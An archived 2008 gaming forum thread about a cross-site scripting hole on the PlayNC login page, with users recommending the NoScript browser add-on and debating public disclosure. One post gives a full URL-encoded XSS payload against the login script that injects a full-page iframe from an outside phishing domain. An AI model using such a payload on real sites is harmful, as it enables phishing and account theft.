May 05, 2008, 08:27 PM // 20:27
|
#41
|
Academy Page
Join Date: Nov 2007
Guild: Hand of the Divine [HOLY]
Profession: W/A
|
Quote:
Originally Posted by lyra_song
*pats No Script*
|
best add-on ever
|
|
|
May 05, 2008, 08:41 PM // 20:41
|
#42
|
Lion's Arch Merchant
Join Date: Dec 2007
Guild: [LOD]
Profession: R/
|
Doesn't work anymore? It did before, but I just checked it and it takes me to the login page now, I even changed the stuff after the language=
|
|
|
May 05, 2008, 08:43 PM // 20:43
|
#43
|
Hell's Protector
Join Date: Oct 2005
Profession: R/Mo
|
Remember folks.
http://noscript.net/
Browse with control. Its a firefox plugin.
No Script blocks Javascript/Java/Flash on EVERY page.
Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).
USE IT NOW.
|
|
|
May 05, 2008, 08:56 PM // 20:56
|
#44
|
Academy Page
Join Date: Jul 2007
Profession: E/
|
Quote:
Originally Posted by lyra_song
*pats No Script*
|
same here
|
|
|
May 05, 2008, 09:07 PM // 21:07
|
#45
|
Guest
|
-but yeah no script is just one of them. if you use it, gogo you!
another one I use faithfully...
http://qfxsoftware.com/
and I must add...lol.. no script has told it's users about this sort of thing for quite some time via pop-up/error console.
Last edited by gone; May 05, 2008 at 09:46 PM // 21:46..
|
|
|
May 05, 2008, 09:14 PM // 21:14
|
#46
|
Krytan Explorer
Join Date: Sep 2007
Location: somewhere on earth!
Profession: E/Me
|
i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
|
|
|
May 05, 2008, 09:21 PM // 21:21
|
#47
|
Hustler
Join Date: Nov 2006
Location: in between GW2 servers
Profession: Mo/
|
Wonder if all these people claiming to have been hacked were with this method. Either way I'm going to go have some drinks.
|
|
|
May 05, 2008, 09:22 PM // 21:22
|
#48
|
Furnace Stoker
|
they fixed it, me thinks.
|
|
|
May 05, 2008, 09:23 PM // 21:23
|
#49
|
Lion's Arch Merchant
Join Date: Apr 2008
Location: The Netherlands, Europe
Guild: Mystic Spiral [MYST]
Profession: W/
|
Quote:
Originally Posted by warcrap
i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
|
They fixed it already, I think.
Or someone can try to do the previous again to see if they fixed the actual problem.
|
|
|
May 05, 2008, 10:31 PM // 22:31
|
#50
|
Underworld Spelunker
Join Date: Nov 2006
Location: wikipedia.org/wiki/Vigo
Guild: Heraldos de la Llama Oscura [HLO]
Profession: E/
|
My FireFox has anti XSS exploit subroutines, so I don't care a bout that.
|
|
|
May 05, 2008, 10:38 PM // 22:38
|
#51
|
rattus rattus
Join Date: Jan 2006
Location: London, UK GMT±0 ±1hr DST
Guild: [GURU]GW [wiki]GW2
Profession: R/
|
Heh, nice.
You seem to have made bugchasing on NCSoft and ANet sites a personal crusade, eh Pablo?
[edit] Hmm, got paranoid enough to install NoScript. Who or what is Quantserve.com?
[edit2] nvm -
Quote:
Originally Posted by quantserve redirect to quantcast.com
What is Quantcast?
From Quantcast
Quantcast is the World’s Only Open Internet Ratings Service
Quantcast is a new media measurement service that lets advertisers view audience reports on millions of websites and services. Only Quantcast combines directly measured audience data with panel-based estimates to deliver accurate third-party metrics and easy-to-read profiles on digital media properties.
Advertisers – Find an Audience!
View detailed audience reports for millions of websites and services to find the audiences you seek and build your brand online with confidence.
Publishers – Make Your Audience Count!
Demonstrate the unique value of your audiences and attract advertisers by tagging your websites, videos, widgets and games for direct measurement.
|
__________________
Si non confectus, non reficiat
Last edited by Snograt; May 05, 2008 at 10:46 PM // 22:46..
|
|
|
May 05, 2008, 11:34 PM // 23:34
|
#52
|
Krytan Explorer
Join Date: Nov 2006
Profession: Rt/
|
Quote:
Originally Posted by lyra_song
Remember folks.
http://noscript.net/
Browse with control. Its a firefox plugin.
No Script blocks Javascript/Java/Flash on EVERY page.
Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).
USE IT NOW.
|
you noscript fanatics are missing out on a lot of sweet ajax implements...just sayin. javascript isn't evil.
...
anyways. as a web developer, this makes me QQ. for shame, plaync!
|
|
|
May 06, 2008, 01:00 AM // 01:00
|
#53
|
rattus rattus
Join Date: Jan 2006
Location: London, UK GMT±0 ±1hr DST
Guild: [GURU]GW [wiki]GW2
Profession: R/
|
Sure, javascript isn't evil. Neither are guns...
__________________
Si non confectus, non reficiat
|
|
|
May 06, 2008, 01:31 AM // 01:31
|
#54
|
Desert Nomad
Join Date: Feb 2006
Location: Censored
Guild: Censored
Profession: R/
|
hxxps://secure.plaync.com/cgi-bin/plaync_login.pl?language="%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%3E%57%48%59%3F%21 %20%57%68%79%20%64%6F%65%73%20%50%6C%61%79%4E%43%2 0%68%61%76%65%20%61%6E%20%58%53%53%20%66%6C%61%77% 20%72%69%67%68%74%20%6F%6E%20%74%68%65%69%72%20%6C %6F%67%69%6E%20%70%61%67%65%3F%3C%69%66%72%61%6D%6 5%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61% 79%6E%63%2E%6A%75%73%74%67%6F%74%6F%77%6E%65%64%2E %63%6F%6D%22%20%77%69%64%74%68%3D%22%31%30%30%25%2 2%20%65%69%67%68%74%3D%22%31%30%30%25%22%3E%3C%2F% 69%66%72%61%6D%65%3E%3C%6E%6F%66%72%61%6D%65%73%3E
No change so far, still same as earlier.
|
|
|
May 06, 2008, 05:00 AM // 05:00
|
#55
|
Jungle Guide
|
Quote:
Originally Posted by Kashrlyyk
Thanks that worked!
|
Doesn´t work for me anymore, so hopefully they actually fixed it.
|
|
|
May 06, 2008, 07:46 AM // 07:46
|
#56
|
Grotto Attendant
Join Date: Jun 2006
Location: Europe
Guild: The German Order [GER]
Profession: N/
|
Quote:
Originally Posted by slowerpoke
if this is an expolit you should prolly report it to them and not advertise it here
|
You don't get exploits fixed in timely matter that way.
|
|
|
May 06, 2008, 07:55 AM // 07:55
|
#57
|
Desert Nomad
|
Quote:
Originally Posted by rohara
you noscript fanatics are missing out on a lot of sweet ajax implements...just sayin. javascript isn't evil.
|
You don't miss out on anything by using NoScript. It simply gives you control over what is allowed to run in your browser. It blocks everything by default, but if you want to see something on a page (and you trust it), you can choose to allow it.
|
|
|
May 06, 2008, 01:07 PM // 13:07
|
#58
|
Krytan Explorer
Join Date: Oct 2006
Guild: [DVDF]
|
Quote:
Originally Posted by Hissy
You don't miss out on anything by using NoScript. It simply gives you control over what is allowed to run in your browser. It blocks everything by default, but if you want to see something on a page (and you trust it), you can choose to allow it.
|
Precisely. NoScript runs a small icon on the bottom task bar of your browser and if you wish to see the scripts on a page you trust you can simply click on the small icon and "allow" scripts for the relevant page. That page/site then goes into NoScript's "white list" and you will be able to view scripts on that page in the future without having to "re-do" the permission. Or you can "temporarily allow" scripts for that page and the permission will expire when you leave the page.
The add-ons for Firefox also have a cookie blocker, java blocker and others that I use, which function in exactly the same way. It gives ME the choice of what I wish to get dumped on me, not the other way round.
|
|
|
May 06, 2008, 03:53 PM // 15:53
|
#59
|
Krytan Explorer
Join Date: Jul 2005
Profession: W/R
|
Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?
The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.
Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
|
|
|
May 06, 2008, 04:50 PM // 16:50
|
#60
|
Grotto Attendant
|
Quote:
Originally Posted by ducktape
Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?
The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.
Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
|
It was a cross-site script/phish combo. Or at least that was the most obvious application.
|
|
|
Thread Tools |
|
Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT. The time now is 09:31 PM // 21:31.
|